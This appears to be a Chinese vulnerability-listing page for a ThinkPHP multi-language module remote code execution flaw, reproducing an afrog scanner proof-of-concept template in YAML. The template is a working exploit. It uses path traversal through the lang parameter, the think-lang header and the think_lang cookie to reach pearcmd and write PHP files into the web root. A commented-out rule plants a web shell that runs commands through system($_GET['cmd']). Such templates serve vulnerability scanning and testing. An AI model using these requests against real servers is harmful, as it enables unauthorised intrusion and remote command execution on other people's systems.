thinkphp-lang-rce: thinkphpRce

日期: 2025-09-01 | 影响软件: thinkphp-lang-rce | POC: 已公开

漏洞描述

thinkphp多语言模块存在Rce漏洞 app="Thinkphp"

PoC代码[已公开]

id: thinkphp-lang-rce

info:
    name: thinkphpRce
    author: 7eleven
    severity: high
    description: |
        thinkphp多语言模块存在Rce漏洞
        app="Thinkphp"
set:
  n1: randomInt(800000000, 1000000000)
payloads:
    payloads:
      parm1: |
          "?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?="
      parm2: |
          "?+config-create+/<?="
rules:
  # r00:
  #     request:
  #       method: GET
  #       path: "/public/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{n1}}.php"
  #     expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
  r0:
    request:
      method: GET
      path: "/{{parm1}}md5({{n1}});?>+/var/www/html/{{n1}}.php"
      headers: 
        think-lang: ../../../../../../../../usr/local/lib/php/pearcmd
        Cookie: think_lang=../../../../../../../../usr/local/lib/php/pearcmd
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: "/{{parm2}}md5({{n1}});?>+/var/www/html/{{n1}}.php"
      headers: 
        think-lang: ../../../../../../../../usr/local/lib/php/pearcmd
        Cookie: think_lang=../../../../../../../../usr/local/lib/php/pearcmd
    expression: response.status == 200
  r2:
    request:
      method: GET
      path: ^{{n1}}.php
    expression: response.body.bcontains(bytes(md5(string(n1))))
expression: (r0() || r1()) && r2()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-lang-rce.yaml

相关漏洞推荐